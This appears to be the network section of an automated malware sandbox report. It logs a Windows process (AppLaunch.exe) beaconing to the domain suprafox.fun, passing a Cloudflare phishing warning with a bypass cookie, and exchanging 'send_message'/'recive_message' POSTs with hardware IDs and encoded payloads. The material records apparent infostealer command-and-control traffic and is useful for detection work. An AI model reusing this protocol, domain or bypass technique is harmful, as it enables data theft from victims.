Oct 24, 2023 00:06:44.320540905 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320605993 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320637941 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320710897 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320741892 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320771933 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320843935 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320873976 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320905924 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320935965 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321012020 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321043015 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321115971 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321147919 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321254969 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321285963 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321316957 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321347952 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321378946 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321450949 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321527958 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321604967 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321670055 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321702957 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321887970 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.321919918 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:45.853336096 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:45.853387117 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:45.853445053 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:45.856477022 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:53.330745935 CEST	49739	80	192.168.2.4	104.21.92.91

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2023 00:06:03.875981092 CEST	63512	53	192.168.2.4	1.1.1.1
Oct 24, 2023 00:06:03.980036020 CEST	53	63512	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 24, 2023 00:06:03.875981092 CEST	192.168.2.4	1.1.1.1	0xd51a	Standard query (0)	suprafox.fun	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 24, 2023 00:06:03.980036020 CEST	1.1.1.1	192.168.2.4	0xd51a	No error (0)	suprafox.fun		104.21.92.91	A (IP address)	IN (0x0001)	false
Oct 24, 2023 00:06:03.980036020 CEST	1.1.1.1	192.168.2.4	0xd51a	No error (0)	suprafox.fun		172.67.190.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

suprafox.fun

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49738	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:04.091068029 CEST	0	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 8 Host: suprafox.fun
Oct 24, 2023 00:06:04.091094971 CEST	0	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Oct 24, 2023 00:06:04.202524900 CEST	2	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H7icYfRUCZgsgovBKmXPaH6oX%2B8HgPjlU6BXnqz4LMSKy%2BLcg8vZPGjU7ZrEqxBKliozOWkGMoXSB9mCZkGmT9sspvf4%2F5NNuqWy%2FT9JAEgxV4AdK6wAyguJob8OIG0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad48fbca6b082b-IAD Data Raw: 31 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 Data Ascii: 1276<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /><!
Oct 24, 2023 00:06:04.202541113 CEST	3	IN	Data Raw: 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f Data Ascii: --[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEven
Oct 24, 2023 00:06:04.202764988 CEST	4	IN	Data Raw: 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 73 74 77 6f 72 74 68 79 20 73 6f 75 Data Ascii: on such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="N4hQtCEPMp.xG56
Oct 24, 2023 00:06:04.202778101 CEST	6	IN	Data Raw: 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">81ad48fbca6b082b</strong></span> <span class="cf-footer-separator sm
Oct 24, 2023 00:06:04.202814102 CEST	6	IN	Data Raw: 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 Data Ascii: div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Oct 24, 2023 00:06:04.202825069 CEST	6	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 24, 2023 00:06:04.844316959 CEST	26	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:04.845207930 CEST	27	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
Oct 24, 2023 00:06:05.247518063 CEST	28	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=lqkcacae4nbe49ghoq3v90183c; expires=Fri, 16 Feb 2024 15:52:44 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:05 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zHndSx1Wa%2FekxyJS%2BXCLeJufGJTJZagGk3K66G64vp90%2BdPC5RXisB7M9IBhWppzP%2B232WT4SN4YxuMjIkp1a6VSBmFU8Aq0svekB6%2BiasvUvtWMetbmULf3MCeP%2BM8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad49007f61082b-IAD Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Oct 24, 2023 00:06:05.247534990 CEST	28	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49739	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:04.375807047 CEST	7	OUT	POST /api HTTP/1.1 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Host: suprafox.fun Content-Length: 55 Cache-Control: no-cache Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 54 52 4e 47 56 61 2d 2d 73 74 72 65 61 6d 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=TRNGVa--stream&j=default&ver=4.0
Oct 24, 2023 00:06:04.821419001 CEST	8	IN	HTTP/1.1 200 OK Date: Mon, 23 Oct 2023 22:06:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ducjouq7tfeot3bb3dvpmsdhaj; expires=Fri, 16 Feb 2024 15:52:43 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Fri, 22 Dec 2023 22:06:04 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Kub%2BhvQ64MGka9KGjEcoI02Gw554ERH6MJ9GGV%2FwAIcux0HeNSRSz8Zt%2FlyBr9hZ1svVeubb1a8Y2se%2BwnpamnBeklYpFBJG3vNS%2BFW6YzLey6uye12tEiJs8x7slI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81ad48fd8831821b-IAD Data Raw: 34 31 32 38 0d 0a 53 39 64 31 45 30 43 47 32 76 4c 2f 65 4f 70 37 58 5a 63 61 30 51 76 75 74 6d 59 79 72 71 66 46 7a 6d 58 6c 6b 63 76 64 34 69 77 77 32 6e 38 7a 59 4b 62 36 30 49 6c 61 30 46 74 70 75 78 66 62 4b 38 36 57 52 68 44 64 77 75 66 30 52 5a 48 6a 76 72 6a 4f 49 55 48 33 56 54 4e 67 70 4c 75 57 33 55 4c 4b 48 54 7a 37 61 62 51 6e 34 37 78 47 45 6f 36 48 35 36 73 64 78 36 76 72 68 75 38 6d 61 2f 64 56 4d 32 43 6d 6f 66 2f 31 57 4d 70 62 66 62 63 36 38 53 76 4d 30 77 67 51 6c 49 66 6e 71 77 2b 48 38 4b 65 Data Ascii: 4128S9d1E0CG2vL/eOp7XZca0QvutmYyrqfFzmXlkcvd4iww2n8zYKb60Ila0FtpuxfbK86WRhDdwuf0RZHjvrjOIUH3VTNgpLuW3ULKHTz7abQn47xGEo6H56sdx6vrhu8ma/dVM2Cmof/1WMpbfbc68SvM0wgQlIfnqw+H8Ke
Oct 24, 2023 00:06:04.821476936 CEST	9	IN	Data Raw: 2f 67 30 63 6b 70 78 6c 77 4b 4f 71 39 6d 70 6f 62 6a 68 6f 78 2b 6e 2b 30 62 6f 2f 63 43 46 76 44 7a 36 6a 73 53 65 69 62 36 2f 33 43 44 47 76 33 56 54 4e 69 34 36 44 51 78 56 6a 49 4e 6a 6a 6a 65 35 78 71 6e 64 31 45 50 36 53 48 35 65 35 46 78 Data Ascii: /g0ckpxlwKOq9mpobjhox+n+0bo/cCFvDz6jsSeib6/3CDGv3VTNi46DQxVjINjjje5xqnd1EP6SH5e5FxbG28e8ma/dVM2Cmof/1WMpbfbc68SvM0wgQlIfnoA6H+KO7gEkksBR2Iem/mpMdjBU2+H6zbojRFlXFyavsSeib6/3CDGv3VTNi46DQxVjINjjje5xqnd1EP6SH5e5FxbG28e8ma/dVM2Cmof/1WMpbfbc68SvM0w
Oct 24, 2023 00:06:04.821541071 CEST	11	IN	Data Raw: 52 31 6a 4a 2b 71 38 6d 70 67 65 68 42 4d 2f 38 47 71 37 62 34 76 59 44 46 58 44 77 36 4b 68 41 49 7a 77 75 36 32 44 53 69 65 35 56 7a 39 4e 6a 50 72 53 33 31 6a 4b 57 33 32 33 4f 4c 52 78 7a 49 78 47 45 4f 6e 53 70 4c 77 42 68 4c 50 47 31 38 49 Data Ascii: R1jJ+q8mpgehBM/8Gq7b4vYDFXDw6KhAIzwu62DSie5Vz9NjPrS31jKW323OLRxzIxGEOnSpLwBhLPG18IMa/dVMz2q1/jfWMpbfbdh3AHOlkYSjofl7keA/+nnwg4puxt6Je+zlJkahRIx+3G/YYDTFl3Jza2lAov+qq2DT2n7eBlgpvrS31jKW3/yYPMxzpQjY/vm58NvxbHr/cIMNvt4GWCm+tLfWJF2V7c68SvOlkYSjMKr
Oct 24, 2023 00:06:04.821610928 CEST	12	IN	Data Raw: 30 6e 70 6f 55 68 42 63 79 2f 33 75 2b 4b 63 4b 37 62 42 4b 4f 68 2b 58 75 52 63 57 78 36 62 69 59 44 6e 48 33 56 31 30 6c 36 5a 61 62 6b 52 33 49 64 6c 65 33 4f 76 45 72 7a 70 59 62 48 71 4f 74 35 65 35 46 78 62 48 72 70 75 38 6d 61 2f 64 56 4d Data Ascii: 0npoUhBcy/3u+KcK7bBKOh+XuRcWx6biYDnH3V10l6ZabkR3Idle3OvErzpYbHqOt5e5FxbHrpu8ma/dVM2Cm+tLdHYRZZ7c4v2OA3QRZyc2spQKG+Ky8hkMmvAV7Ieq7nJEciRot/XHzJ+O8RhKOh+XuRcWzrqfAFmv1Nn8v8L+A3XXgW323OvErk5prOKeH5bVo77Hr/cIMa/dVMSXo+MjfWosYMPZ5vm+F3ARWycqqogCA86
Oct 24, 2023 00:06:04.821770906 CEST	14	IN	Data Raw: 6c 6c 51 6e 54 72 78 4b 38 36 57 52 6b 2b 43 72 73 6a 45 62 4d 57 78 73 4e 44 6f 44 47 76 33 56 54 4e 67 70 76 72 51 6d 68 62 49 51 58 32 31 64 62 39 6a 67 64 45 41 57 4d 76 47 70 71 41 44 69 76 36 74 74 6f 52 4c 4f 36 63 52 66 79 4c 72 74 70 2b Data Ascii: llQnTrxK86WRk+CrsjEbMWxsNDoDGv3VTNgpvrQmhbIQX21db9jgdEAWMvGpqADiv6ttoRLO6cRfyLrtp+RCIYcP/k4/QbklkYSjofl7kXH9LH/2AxphABxYovQ0t9Yylt96jbYBuS7bDuOh77Db8Wx6/3CDGv3V3YupODS3RWFCzP6eLJqiN8DVsrEpKkEgvWov4xELr0dfy/ivJabWsZ2V7c68SvOlkYSjMK/7F/Fs5uyjkcq
Oct 24, 2023 00:06:04.821819067 CEST	15	IN	Data Raw: 39 42 75 53 57 52 68 4b 4f 68 2b 57 31 61 4f 2b 78 36 2f 33 43 44 47 76 33 56 54 45 6c 36 50 6a 49 33 31 71 41 46 44 66 2f 66 4c 52 6b 69 39 49 4e 51 73 58 41 71 61 77 44 6a 50 79 76 75 34 4e 4f 4f 37 4d 54 65 53 48 70 74 5a 36 65 48 73 68 58 55 Data Ascii: 9BuSWRhKOh+W1aO+x6/3CDGv3VTEl6PjI31qAFDf/fLRki9INQsXAqawDjPyvu4NOO7MTeSHptZ6eHshXUJ068SvOlkYSjoWgtEffsemNjUAyuhBgKKTX+N9Yylt9t2f9BuSWRhKOh+W1aO+x6/3CDGv3VTEl6PjI31qMFy3+ebhigtMLVcbFqKgEifiovIhDJLsdeCvjtJSaWsZ2V7c68SvOlkYSjMK/7F/Fs4KerWIur1ceSq
Oct 24, 2023 00:06:04.821894884 CEST	16	IN	Data Raw: 7a 69 4f 68 2b 58 75 52 63 57 78 36 2f 2b 48 51 6d 6e 74 56 54 45 69 35 62 57 43 6d 42 75 43 45 7a 4c 39 64 37 5a 73 67 39 41 41 57 38 4c 58 71 61 4d 48 67 66 69 6f 75 6f 4e 46 49 37 73 65 59 32 4b 71 31 2f 6a 66 57 4d 70 62 66 62 63 36 38 53 6d Data Ascii: ziOh+XuRcWx6/+HQmntVTEi5bWCmBuCEzL9d7Zsg9AAW8LXqaMHgfiouoNFI7seY2Kq1/jfWMpbfbc68SmLzEQIjoWNtwaK/+uRi1gu9zZ/KeO0ht114Ft9tzrxK5OaaziOh+XuRcXqxtfCDGv3VTNgpviXkVrQW3/8dr9qi9wMVczOp6MNifS7tYxEO7oUfCbpspWUCI0QObU23AHOlkYSjofl7keA6+nnwg4RvhlDIf/4//VY
Oct 24, 2023 00:06:04.822073936 CEST	18	IN	Data Raw: 75 52 63 57 78 36 2f 33 43 44 47 6d 79 47 7a 46 36 70 76 69 62 6b 78 2b 4a 46 54 58 79 64 71 46 6f 68 74 67 46 56 38 76 4f 74 61 63 56 6a 50 75 71 73 59 68 48 4b 62 73 58 63 43 2f 6b 2b 4e 37 79 63 73 70 62 66 62 63 36 38 53 76 4f 6c 41 4e 49 6a Data Ascii: uRcWx6/3CDGmyGzF6pvibkx+JFTXydqFohtgFV8vOtacVjPuqsYhHKbsXcC/k+N7ycspbfbc68SvOlANIjJ3l7CKk5L+1wm0+ox12LvKzkZ4MhQl/mhDxK86WRhLTi8jERcWx6/3CV0bdVTNgpvrS31jIHjO1IPEph9sKXcfBrqkPhPastYxCKL0eeyfhvpqeFIcYM/FxvWDMmms4jofl7kXFsev/h1Zp7VUxFPS/iJAKyis85G
Oct 24, 2023 00:06:04.822133064 CEST	19	IN	Data Raw: 2f 33 43 44 47 76 33 56 54 4e 69 34 4b 6e 51 78 56 6a 59 53 32 53 67 4b 2b 51 35 33 72 74 73 45 6f 36 48 35 65 35 46 6d 4c 33 47 31 38 49 4d 61 2f 64 56 4d 7a 75 4c 30 4e 4c 66 57 4d 70 62 66 62 63 36 38 33 2f 4d 6a 45 59 43 67 71 72 50 37 6b 58 Data Ascii: /3CDGv3VTNi4KnQxVjYS2SgK+Q53rtsEo6H5e5FmL3G18IMa/dVMzuL0NLfWMpbfbc683/MjEYCgqrP7kXFsev9wgxpp1cpYKT/k48Ijhop9j+NV6LTAlXL1eWCDJP06fHvJmv3VTNgpvrS3RXIQX3MOPsps5prOI6H5e5FxbHr/5gOcfdXRCHqtpeLC8U3OPN9tHnO+g9Ey4Xpw2/Fsev9wgxr91d3Yrz6wNN14Ft9tzrxK86W
Oct 24, 2023 00:06:04.822236061 CEST	20	IN	Data Raw: 33 56 54 4d 39 71 74 66 34 33 31 6a 4b 57 33 32 33 59 64 77 42 7a 70 5a 47 45 6f 36 48 35 65 35 48 6b 62 50 78 2f 64 49 41 52 74 31 56 4d 32 43 6d 2b 74 4c 66 57 4d 67 4c 66 36 30 36 38 79 36 50 78 68 5a 57 7a 39 4f 6b 36 7a 6d 35 30 36 4b 7a 67 Data Ascii: 3VTM9qtf431jKW323YdwBzpZGEo6H5e5HkbPx/dIARt1VM2Cm+tLfWMgLf6068y6PxhZWz9Ok6zm506Kzg0Ioslc/TYz60t9Yylt9tzi8KdSWPRDP17XjFpH+ubjMRji4GzFspvjcmRGEHDjlN6F5h9gSHMjX5+JFx+KisJJALvoGZy/0u5WaVoAIMvk4jCfjvEYSjofl7kXFs7H/2AxpgBR/LOOugdA6gxU8+Xm0KcK7bBKOh+
Oct 24, 2023 00:06:04.822299957 CEST	22	IN	Data Raw: 50 62 2f 39 56 6a 4b 57 33 32 33 4f 76 45 72 7a 4e 74 45 43 49 37 38 79 4d 52 46 78 62 48 72 2f 63 49 4d 61 2f 64 56 4d 32 43 6b 71 4a 65 63 48 59 51 50 4c 76 4a 6f 70 32 36 63 78 55 68 4b 77 38 76 6e 34 6d 6a 76 73 65 76 39 77 67 78 72 39 31 55 Data Ascii: Pb/9VjKW323OvErzNtECI78yMRFxbHr/cIMa/dVM2CkqJecHYQPLvJop26cxUhKw8vn4mjvsev9wgxr91UzYKb60IwRnh4w9nSwbIvESErDy+fDb8Wx6/3CDGv3KD9NjPrS31jKW323OKsp1JZEc97XqacGhOWisoxfZJEcfyXcs56TGchXUJ068SvOlkYSjoWh7F/Fo+fQ6Axr91UzYKb60JkLyEF9pSroPN+DVAKjreXuRcWx

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49748	104.21.92.91	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Timestamp	kBytes transferred	Direction	Data
Oct 24, 2023 00:06:09.493503094 CEST	50	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 Cookie: __cf_mw_byp=N4hQtCEPMp.xG56yhPh3atIUoRF_guPEAa.58z6Jm6M-1698098764-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 535 Host: suprafox.fun
Oct 24, 2023 00:06:09.494338036 CEST	50	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"45DCC006916375A84E5F84BCE7A7479D9DCC3556--SqDe87817huf871793q74Content-Disposition
